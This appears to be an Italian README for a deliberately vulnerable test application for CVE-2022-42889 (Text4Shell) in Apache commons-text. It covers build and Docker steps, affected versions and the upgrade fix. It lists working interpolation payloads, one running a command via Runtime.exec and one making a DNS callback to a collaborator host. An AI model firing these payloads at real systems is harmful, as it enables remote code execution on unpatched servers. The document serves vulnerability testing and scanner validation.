
Applicazione Proof of Concept per testare CVE-2022-42889
Questa è un'applicazione vulnerabile sviluppata come Proof of Concept per la vulnerabilità CVE-2022-42889.
Per eseguire questo avrai bisogno di:
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
mvn clean install
Questo creerà la cartella ./target e all'interno di essa dovrebbe esserci il file JAR text4shell-poc-0.0.1-SNAPSHOT.jar
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar
Questo avvierà un server web sul tuo localhost in ascolto sulla porta 8080 di default
Accedi al server web all'indirizzo http://localhost:8080/ e dovresti vedere il seguente output
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
Payload di esempio per exploit
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
${dns:<burp collaborator host>)}
Encoder URL consigliato per una dimostrazione di exploit di successo: https://www.urlencoder.org/.
In alternativa puoi usare Docker per eseguire questo PoC:
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
docker build --tag=text4shell-poc .
docker run -p 80:8080 text4shell-poc
http://localhost/
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
${dns:<burp collaborator host>)}
Encoder URL consigliato per una dimostrazione di exploit di successo: https://www.urlencoder.org/.
In alternativa puoi validare l'efficacia di strumenti di scansione come text4shell-scan
Affinché il tuo codice sia vulnerabile devi:
commons-text dalla versione 1.5.0 fino alla (esclusa) 1.10.0La soluzione è aggiornare le tue istanze di commons-text alla versione 1.10.0 o successiva.
Bryan Smith